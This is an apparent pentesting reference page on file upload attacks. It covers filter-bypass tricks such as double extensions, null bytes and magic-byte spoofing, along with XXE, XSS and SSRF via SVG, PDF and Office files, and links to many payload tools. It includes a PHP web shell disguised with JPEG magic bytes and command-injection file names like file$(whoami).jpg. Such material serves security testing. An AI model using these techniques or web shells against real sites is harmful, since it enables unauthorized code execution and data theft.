File Upload Attacks

Upload Scanner - Burp Extension

LogoUpload Scannerportswigger.net

Absent Validation

Vulnerability identification

<?php echo "Hello HTB";?> to test.php

Read local files

Web Shells

LogoWeb Shells 101 Using PHP (Web Shells Part 2) | AcunetixAcunetix
Web Shell

PHP disabled_functions

Logo5 Advanced Ways I Test For File Upload VulnerabilitiesMedium

File Type Check - Client-Side Validation

Back-end Request Modification

Disabling Front-end Validation

Tip: You may also do the same to remove accept=".jpg,.jpeg,.png", which should make selecting the PHP shell easier in the file selection dialog, though this is not mandatory, as mentioned earlier.

Blacklist Filters

Blacklisting Extensions

Tip: The comparison above is also case-sensitive, and is only considering lowercase extensions. In Windows Servers, file names are case insensitive, so we may try uploading a php with a mixed-case (e.g. pHp), which may bypass the blacklist as well, and should still execute as a PHP script.

Bypass File Extension Exclusion Lists

Variations of PHP file extensions

Variation of ASP.NET file extensions

Variations of Java file extensions

Various other file extension to test for

Fuzzing Extensions

PHP List

LogoPayloadsAllTheThings/Upload Insecure Files/Extension PHP/extensions.lst at master · swisskyrepo/PayloadsAllTheThingsGitHub

ASP extensions

LogoPayloadsAllTheThings/Upload Insecure Files/Extension ASP at master · swisskyrepo/PayloadsAllTheThingsGitHub

Web extensions

LogoSecLists/Discovery/Web-Content/web-extensions.txt at master · danielmiessler/SecListsGitHub

More extensions

LogoOffensive-Payloads/File-Extensions-Wordlist.txt at main · InfoSecWarrior/Offensive-PayloadsGitHub

What extension is allowed ?

Upload a file, once this request is captured, send it to the Intruder. Click on "Payloads" and select the "Sniper" attack type.

Click the "Positions" tab now, find the filename and "Add §" to the extension. It should look like so:

Use /usr/share/wordlists/dirb/extensions_common.txt

Uncheck url-encoding

Run the attack

Search for Non-Blacklisted Extensions - Look Content Length

Not all extensions will work with all web server configurations, so we may need to try several extensions to get one that successfully executes PHP code.

Type of attack based on extension

ASP Applications:

.asa -> potential remote code execution

.asax -> potential remote code execution

.asp -> potential remote code execution .aspx -> potential remote code execution

Java Applications:

.jsp -> potential remote code execution

.jspx -> potential remote code execution

Perl Applications:

.pl -> potential remote code execution

Python Applications:

.py -> potential remote code execution

Ruby Applications:

.rb -> potential remote code execution

Other files that should be restricted for most applications:

.bat

.cgi .exe

.htm -> potential XSS

.html -> potential XSS

.jar

.rar

.shtml

.svg -> potential XSS

.swf -> potential XSS

.tar

.zip

.cer -> potential XSS

.hxt -> potential XSS

.stm -> potential XSS

Whitelist Filters

Double Extensions

Rename it

shell.jpg.php

shell.phar.jpeg

exploit%2Ephp

exploit.asp;.jpg or exploit.asp%00.jpg

Fuzz the upload form with This Wordlist to find what extensions are whitelisted by the upload form

Only consider the final file extension, as it uses (^.*\.) to match everything up to the last (.), and then uses ($) at the end to only match extensions that end the file name

Insecure configuration:

/etc/apache2/mods-enabled/php7.4.conf

shell.php.jpg should pass the earlier whitelist test as it ends with (.jpg), and it would be able to execute PHP code due to the above misconfiguration, as it contains (.php) in its name.

The web application may still utilize a blacklist to deny requests containing PHP extensions. Try to fuzz the upload form with the PHP Wordlist to find what extensions are blacklisted by the upload form.

Bypass

1️⃣ Rename `shell.php` to `shell.jpg`.

2️⃣ Upload the file and intercept the request.

3️⃣ Modify the filename to `shell.jpg.php`.

4️⃣ Change the Content-Type to `application/x-httpd-php`.

5️⃣ Upload succeeds, and the file gets executed as PHP!

Capitalize the file extension

Obfuscationg file extension

Character Injection

We can inject several characters before or after the final extension to cause the web application to misinterpret the filename and execute the uploaded file as a PHP script.

The following are some of the characters we may try injecting:

  • %20

  • %0a

  • %00

  • %0d0a

  • /

  • .\

  • .

  • :

Null Byte

shell.php%00.jpg works with PHP servers with version 5.X or earlier

Windows server: injecting a colon (:) before the allowed file extension (e.g. shell.aspx:.jpg), which should also write the file as (shell.aspx)

exploit.asp;.jpg or exploit.asp%00.jpg

Then, fuzz extensions

wordlist.txt

Add .phar et .php8 to the list

New wordlist

Type Filters

Content-Type

Fuzz Content-Type header:

https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txtgithub.com

Only images are allowed - reduces the wordlist to 45 types only (compared to around 700 originally):

Intercept our upload request and change the Content-Type header to it:

Also try with:

Note: A file upload HTTP request has two Content-Type headers, one for the attached file (at the bottom), and one for the full request (at the top). We usually need to modify the file's Content-Type header, but in some cases the request will only contain the main Content-Type header (e.g. if the uploaded content was sent as POST data), in which case we will need to modify the main Content-Type header.

MIME-Type

LogoList of file signaturesWikipedia

Start with GIF

PHP - Example testing the MIME type of an uploaded file:

Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters:

GIF not allowed - Upload a jpeg/PNG file, change the content without removing file signature

Magic Bytes

See Magic Numbers

These are the magic bytes for a normal image (PNG) in HEX:

File Upload Validation Bypass

LogoBreaking Down Multipart Parsers: File upload validation bypassSicuranext Blog

File Upload Path Traversal

Executable can be uploaded but restriction prevents execution. Try uploading to another folder

https://medium.com/@jp-sec/file-upload-attacks-with-path-traversal-9b6ba1d561f1medium.com

Other vectors of attacks

LogoFile Upload Path TraversalGitHub

File Upload Bypass to CSPT

LogoBypassing File Upload Restrictions To Exploit Client-Side Path Traversal · Doyensec's Blogblog.doyensec.com

Bypass content length validation

Small payload

PDF Converter - Libre Office

Upload .odt file - Download generated pdf and analyse it with exiftool

LogoGitHub - elweth-sec/CVE-2023-2255: CVE-2023-2255 Libre OfficeGitHub
LogoCTFtime.org / Facebook CTF 2019 / pdfme / WriteupCTFtime
LogoDocument-Converter | CTFsctf.zeyu2001.com

Limited File Uploads

XSS

XSS

Try to inject xss in file name. For example:

LogoGitHub - coffinxp/img-payloadsGitHub
Logofile_upload_payloads/xss/rxss at main · h6nt3r/file_upload_payloadsGitHub

Comment

SVG

alert.svg

domain.svg

HTB.svg

Other payload

Logo5 Advanced Ways I Test For File Upload VulnerabilitiesMedium

SVG - Keylogger

LogoGitHub - 11whoami99/XSS-keylogger: A Simple JS code to keylogger data and send it to the personal serverGitHub

SVG - Open Redirect

Logowizlynx group | Open Redirect Vulnerability in SuiteCRMwww.wizlynxgroup.com

SVG - XXE - X-Requested-With: XMLHttpRequest

poc.svg

Read source code in PHP web applications

XML data is not unique to SVG images, as it is also utilized by many types of documents, like PDF, Word Documents, PowerPoint Documents, among many others.

XXE vulnerability to enumerate the internally available services or even call private APIs to perform private actions

XXE / XSLT

XML - XSS

HTML files

SSRF

PDFs, SVGs, or even Office documents. If the backend processes these files, SSRF might be hiding here

LogoThe PDF Trojan Horse: Leveraging HTML Injection for SSRF and Internal Resource AccessMedium
SSRF

PDF Generators

LogoHunting for SSRF Bugs in PDF Generators  - Black Hills Information Security, Inc.Black Hills Information Security, Inc.
LogoExploiting SSRF in PDF HTML Injection: Basic and BlindMedium

DoS

  • Decompression Bomb

  • Pixel Flood

Other Upload Attacks

In images

Information Leakage / Metadata

Check for software version, GPS location, username, etc.

LogoGitHub - ianare/exif-samples: Sample images for testing Exif metadata retrieval.GitHub

SVG File

Hosts that process SVG can potentially be vulnerable to SSRF, LFI, XSS, RCE because of the rich feature set of SVG

LogoGitHub - allanlw/svg-cheatsheet: A cheatsheet for exploiting server-side SVG processors.GitHub

Metadata

LogoGitHub - absholi7ly/MetaInjector: MetaInjector is a tool designed to test security by injecting malicious payloads (such as XSS, SQL Injection, remote code execution, etc.) into image metadata. The tool supports image formats such as JPEG, PNG, and SVGGitHub

Exiftool

Content-Type

Change content-type to text/html

Add the malicious javascript code at the bottom of the image content

XSS

ImageMagick ?

test.jpeg

LogoSemrush disclosed on HackerOne: Remote Code Execution on...HackerOne
LogoVulnerability Deep Dive: Gaining RCE Through ImageMagick With Frans Rosen | HackerOneHackerOne

Others

LogoCTF-notes/penbook/bypass_image_upload.md at master · Shiva108/CTF-notesGitHub
LogoGitHub - dlegs/php-jpeg-injector: Injects php payloads into jpeg imagesGitHub
LogoGitHub - coffinxp/img-payloadsGitHub
LogoPersistent PHP payloads in PNGs: How to inject PHP code in an image –Synacktiv
LogoGitHub - Maldev-Academy/EmbedPayloadInPng: Embed a payload inside a PNG fileGitHub

XXE in SVG

XXE in XMP metadata of JPEG file

https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf

LogoInformatica disclosed on HackerOne: XXE through injection of a...HackerOne
LogoWrite-ups | AppSecevanluke.gitbook.io

Injections in File Name

Name a file file$(whoami).jpg or file`whoami`.jpg or file.jpg||whoami

Command Injection

XSS payload in the file name (e.g. <script>alert(window.origin);</script>), which would get executed on the target's machine if the file name is displayed to them. We may also inject an SQL query in the file name (e.g. file';select+sleep(5);--.jpg), which may lead to an SQL injection if the file name is insecurely used in an SQL query.

XSS

.htaccess

LogoCTFtime.org / VolgaCTF 2017 Quals / SharePoint / WriteupCTFtime

Web shell via Path Traveral

LogoLab: Web shell upload via path traversal | Web Security AcademyWebSecAcademy

Zip file

Example 1

Example 2

LogoHTB: Zipping0xdf hacks stuff

Zip Slip

LogoGitHub - snyk/zip-slip-vulnerability: Zip Slip Vulnerability (Arbitrary file write through archive extraction)GitHub
LogoGitHub - 0xless/slip: Slip is a CLI tool to create malicious archive files containing path traversal payloads. It supports zip, tar, 7z and zip-like (jar, war, apk, ipa, ...) archivesGitHub
https://swisskyrepo.github.io/PayloadsAllTheThings/Upload%20Insecure%20Files/Zip%20Slip/#summaryswisskyrepo.github.io

DOCX/XLSX (Excel)/PPTX - Office Files - XXE

Payload

Logopayloads/xxe at master · l50/payloadsGitHub
LogoGitHub - whitel1st/docem: A tool to embed XXE and XSS payloads in docx, odt, pptx, xlsx files (oxml_xxe on steroids)GitHub

https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf

https://oxmlxxe.github.io/oxmlxxe.github.io
LogoGitHub - BuffaloWill/oxml_xxe: A tool for embedding XXE/XML exploits into different filetypesGitHub
LogoCTFtime.org / DarkCTF / File Reader / WriteupCTFtime
LogoHackpack CTF 2021: Indead v2Medium
LogoHTB: Patents0xdf hacks stuff

PDF Files

SSRF ?

LogoHacking With PDF0xcybery.github.io

Reveal Real IP adress - Bypass WAF etc.

LogoHow a PDF File Can Expose Your Application’s Real IP (Even with CDN and WAF)Medium

Create a PDF file with Canary Token

LogoKnow. Before it mattersCanarytokens

Upload and visit the file. You will receive an email with the real IP. Try to access the server using the real IP. If it works, you can bypass WAF, CDN, etc.

XSS in PDF Files

PoC:

Logofile_upload_payloads/xss/rxss at main · h6nt3r/file_upload_payloadsGitHub
Logovulnerabilities/xss/generate_pdf_xss.py at main · mrdesoky0/vulnerabilitiesGitHub

Also Check Payload Part

Tools

LogoGitHub - jonaslejon/malicious-pdf: 💀 Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.shGitHub

Using malicious pdf payloads, check if the backend made a request from inside. If so, test multiple SSRF paths:

SSRF
LogoGitHub - cornerpirate/JS2PDFInjector: Inject a JS file into a PDF file.GitHub
https://github.com/K3rnel-Dev/pdf-exploitgithub.com

Payload

LogoGitHub - luigigubello/PayloadsAllThePDFs: PDF Files for PentestingGitHub
LogoGitHub - coffinxp/pdFExploitsGitHub
LogoGitHub - meljith-lab/Pdf-xssGitHub

XSS PDF: https://dr34m14.github.io/dr34m14/payloads/js_injected_xss.pdf

If you want to use bank_statement.pdf , link_URI.pdf or 'Blind xss PDF.pdf' from the Pdf-XSS repo, remember to change the url. See an example below

ImageMagick ?

pdf.js - CVE-2024-4367

LogoCVE-2024-4367 - Arbitrary JavaScript execution in PDF.js - Codean Labscodeanlabs
LogoGitHub - LOURC0D3/CVE-2024-4367-PoC: CVE-2024-4367 & CVE-2024-34342 Proof of ConceptGitHub
Logopdfjs-vuln-demo/example-pdfs at main · clarkio/pdfjs-vuln-demoGitHub
Logopdfjs-vuln-demo/public at main · clarkio/pdfjs-vuln-demoGitHub

File read

Malicious PDF File Used As Delivery Mechanism

LogoMalicious PDF File Used As Delivery Mechanism - SANS ISCSANS Internet Storm Center

php inside pdf

bad.pdf.php

Log4Shell

LogoGitHub - eelyvy/log4jshell-pdf: The purpose of this project is to demonstrate the Log4Shell exploit with Log4J vulnerabilities using PDF as delivery channelGitHub

XXE in PDF

https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf

LogoGitHub - BuffaloWill/oxml_xxe: A tool for embedding XXE/XML exploits into different filetypesGitHub

ImageMagick

LogoPlaying with ImageTragick like it's 2016Synacktiv

Right to left override

Bind and Reverse Shell

Magic Number

Add four "A" on the first line of shell.php.

hexeditor shell.php

Change the first 4 bytes "41 41 41 41" to "FF D8 FF DB" (jpeg magic number)

Result:

00000000 FF D8 FF DB 3C 3F 70 68 70 20 73 79 73 74 65 6D <?php system 00000010 28 24 5F 47 45 54 5B 63 6D 64 5D 29 3B 20 3F 3E ET[cmd]); ?> 00000020 0A

Save. Verification: file shell.php : shell.php: JPEG image data

Magic numbers list:

Uploading files using PUT

HTTP Verb Tampering

If appropriate defenses aren't in place, this can provide an alternative means of uploading malicious files, even when an upload function isn't available via the web interface.

Eicar files - AV Testing

LogoGitHub - fire1ce/eicar-standard-antivirus-test-files: eicar standard antivirus test filesGitHub

Payloads

LogoIntruderPayloads/Uploads at master · 1N3/IntruderPayloadsGitHub

Tools

LogoGitHub - sAjibuu/Upload_Bypass: A simple tool for bypassing file upload restrictions.GitHub
LogoGitHub - almandin/fuxploider: File upload vulnerability scanner and exploitation tool.GitHub
LogoFuxploider - File Upload Vulnerability Scanner And Exploitation Tool - GeeksforGeeksGeeksforGeeks

Resources

LogoUpload Insecure Files - Payloads All The Thingsswisskyrepo.github.io
LogoPayloadsAllTheThings/Upload Insecure Files at master · swisskyrepo/PayloadsAllTheThingsGitHub
LogoBypassing File Upload RestrictionsPenetration Testing Lab
LogoFile Upload VulnerabilitiesIntigriti
LogoFile Upload Vulnerabilities: Advanced Exploitation GuideIntigriti

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

PreviousFile Inclusion LFI / RFINextCommand Injection

Last updated